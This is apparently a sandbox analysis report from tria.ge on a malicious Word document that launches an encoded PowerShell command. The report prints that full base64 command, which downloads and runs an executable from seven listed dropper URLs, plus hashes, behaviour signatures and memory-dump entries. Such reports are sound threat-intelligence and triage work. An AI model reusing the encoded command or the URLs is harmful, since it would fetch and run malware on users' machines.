Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2024, 09:13

General

  • Target

    16fb192508fa330cafdcfa5d1a23b0fb_JaffaCakes118.doc

  • Size

    164KB

  • MD5

    16fb192508fa330cafdcfa5d1a23b0fb

  • SHA1

    7f38d60f95f0b7428374477921c0722674a80e0c

  • SHA256

    496ea95f7dd559363ca3b949aaaf3c4f291fe0c2fdb2eb85e8ec581df270e46b

  • SHA512

    9e824d9fdf38f8eec2c27b55a71a9490b469638c69e9a95661cf99a4977f652a1f0c029f4a13e7369d7d408854ac0cb5c27d2b9d427b6cd8928e27d69adabeae

  • SSDEEP

    1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a9Zay9y0J6f264N+s:mrfrzOH98ipgLPJ6fQ+s

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.yusukelife.com/wp/ure/

exe.dropper

https://www.ingyouth.com/wp-includes/0zCW/

exe.dropper

http://alphapharma247.com/wp-content/plugins/r/

exe.dropper

http://muanha24h.com/wp-content/fHS7/

exe.dropper

http://buyhacks.net/wp-content/jgLqdhk/

exe.dropper

https://comsotaque.com/wp-includes/5i/

exe.dropper

https://qualitychildcarepreschool.com/emqblk/Ik2D/

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\16fb192508fa330cafdcfa5d1a23b0fb_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABXAHUAawBkAGYAaQAzAD0AKAAnAFMAcQAnACsAKAAnAHAAJwArACcAOQBpAHQAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAUgBQAHIATwBmAGkAbABFAFwAcABUADEANgBWAGkANgBcAGIAUABNAGkANQBBAHMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGAAQwBVAHIAYABJAHQAeQBQAFIAbwB0AGAAbwBjAE8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAnACwAIAAnACsAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADEAJwArACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABIAHIAMQB0AHEAdwA5ACAAPQAgACgAJwBYADUAJwArACgAJwB3ADYAegAnACsAJwBsAHMAJwApACkAOwAkAEUAXwB1AF8AdwB4AGQAPQAoACgAJwBaAGMAJwArACcAeQA4ACcAKQArACcAbAA1ACcAKwAnADEAJwApADsAJABLAGEANgB4AHAAMAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAVAAnACsAKAAnAHkAJwArACcAUAB0ADEANgAnACsAJwB2ACcAKQArACcAaQAnACsAKAAnADYAJwArACcAOQBUACcAKQArACgAJwB5AEIAcABtAGkANQAnACsAJwBhAHMAJwArACcAOQBUAHkAJwApACkALQBjAFIARQBwAEwAQQBjAEUAIAAoACcAOQAnACsAJwBUAHkAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEgAcgAxAHQAcQB3ADkAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABUADkAZQBlADQAOQB3AD0AKAAoACcAWQAnACsAJwAwAG0AYQAnACkAKwAoACcAcAAnACsAJwB4ADAAJwApACkAOwAkAEIAXwB4AHoAZQBhADYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdgBuAHoAbwAwAGMAPQAoACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHcAdwAnACkAKwAnAHcALgAnACsAJwB5AHUAJwArACgAJwBzACcAKwAnAHUAawBlAGwAJwApACsAKAAnAGkAJwArACcAZgBlAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAvAHUAJwArACcAcgBlACcAKwAnAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcABzADoAJwArACcALwAnACkAKwAnAC8AJwArACcAdwAnACsAJwB3AHcAJwArACgAJwAuAGkAbgBnACcAKwAnAHkAbwB1ACcAKQArACgAJwB0AGgAJwArACcALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvACcAKwAnADAAegBDAFcALwAnACkAKwAnACoAJwArACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AJwArACcAYQBsACcAKwAoACcAcAAnACsAJwBoAGEAJwApACsAKAAnAHAAJwArACcAaABhAHIAbQBhADIAJwApACsAKAAnADQANwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBjAG8AJwArACcAbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwBwAGwAJwApACsAJwB1ACcAKwAnAGcAJwArACgAJwBpAG4AJwArACcAcwAvAHIAJwArACcALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAvACcAKQArACgAJwBtAHUAJwArACcAYQAnACkAKwAnAG4AJwArACcAaAAnACsAJwBhACcAKwAoACcAMgA0AGgAJwArACcALgAnACsAJwBjAG8AbQAnACsAJwAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAoACcAdAAvAGYASAAnACsAJwBTACcAKQArACgAJwA3AC8AJwArACcAKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwBiAHUAJwApACsAJwB5AGgAJwArACgAJwBhAGMAJwArACcAawBzACcAKQArACgAJwAuACcAKwAnAG4AJwArACcAZQB0AC8AdwBwAC0AYwBvAG4AJwArACcAdAAnACsAJwBlACcAKQArACcAbgAnACsAJwB0ACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGcATAAnACkAKwAoACcAcQBkAGgAawAnACsAJwAvACcAKQArACcAKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAJwArACgAJwA6AC8ALwAnACsAJwBjAG8AJwApACsAJwBtAHMAJwArACgAJwBvACcAKwAnAHQAYQBxAHUAZQAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGkAbgAnACsAJwBjAGwAJwApACsAKAAnAHUAZABlACcAKwAnAHMAJwApACsAJwAvADUAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvACcAKQArACcALwBxACcAKwAnAHUAYQAnACsAJwBsACcAKwAoACcAaQAnACsAJwB0AHkAJwApACsAKAAnAGMAJwArACcAaABpAGwAZAAnACkAKwAnAGMAJwArACgAJwBhAHIAJwArACcAZQAnACkAKwAoACcAcAAnACsAJwByAGUAcwAnACkAKwAnAGMAaAAnACsAJwBvACcAKwAnAG8AbAAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBlAG0AcQAnACsAJwBiAGwAJwArACcAawAvAEkAJwApACsAKAAnAGsAJwArACcAMgBEAC8AJwApACkALgAiAFMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQgBkADAAZgB5ADMAZgA9ACgAJwBKACcAKwAnAGYAMAAnACsAKAAnAGYANwAnACsAJwB3AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABaADYAegBoAG8AbwBmACAAaQBuACAAJABTAHYAbgB6AG8AMABjACkAewB0AHIAeQB7ACQAQgBfAHgAegBlAGEANgAuACIAZABPAFcAYABOAGAAbABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgA2AHoAaABvAG8AZgAsACAAJABLAGEANgB4AHAAMAA3ACkAOwAkAEMAaQBkADIAZwBuAG8APQAoACgAJwBLAGEAYwAnACsAJwB5ACcAKwAnAGsAYwAnACkAKwAnADYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsAYQA2AHgAcAAwADcAKQAuACIAbABgAEUATgBgAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADMANAApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABLAGEANgB4AHAAMAA3ACkAOwAkAEQANgBpADcAdQAxAF8APQAoACcAQgAzACcAKwAoACcAeQAwACcAKwAnAHEAeQBsACcAKQApADsAYgByAGUAYQBrADsAJABIADgAZwB1AGgAbgB6AD0AKAAnAFMAMwAnACsAKAAnAHgAMQBzACcAKwAnADMAJwApACsAJwBrACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBiADIAMwA2AGcAdAA9ACgAKAAnAEMAJwArACcAMABlACcAKQArACcAdwAyACcAKwAnAGoAOQAnACkA
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2432

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      19ababc3ab4c11f3c35ed3979e2793bd

      SHA1

      5194dd79ffefc38091a6c65ef43784c8e60ceac3

      SHA256

      d72901b25764a9d16cd99287dc6fb1e13cce18c98497d175224ce89ac1e1afe8

      SHA512

      2de71244556dfcfd4f210af4842baa42270487ea269a3c13419e2928b2b12d0bb9497e132eee11e082c236f68c35eac1714bec846ed6830e1b535490ca778502

    • memory/2280-34-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-49-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-7-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-23-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-22-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-8-0x0000000005C00000-0x0000000005D00000-memory.dmp

      Filesize

      1024KB

    • memory/2280-33-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-0-0x000000002F581000-0x000000002F582000-memory.dmp

      Filesize

      4KB

    • memory/2280-2-0x000000007158D000-0x0000000071598000-memory.dmp

      Filesize

      44KB

    • memory/2280-67-0x000000007158D000-0x0000000071598000-memory.dmp

      Filesize

      44KB

    • memory/2280-32-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-47-0x000000007158D000-0x0000000071598000-memory.dmp

      Filesize

      44KB

    • memory/2280-48-0x00000000058B0000-0x00000000059B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2280-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2432-40-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2432-41-0x00000000022E0000-0x00000000022E8000-memory.dmp

      Filesize

      32KB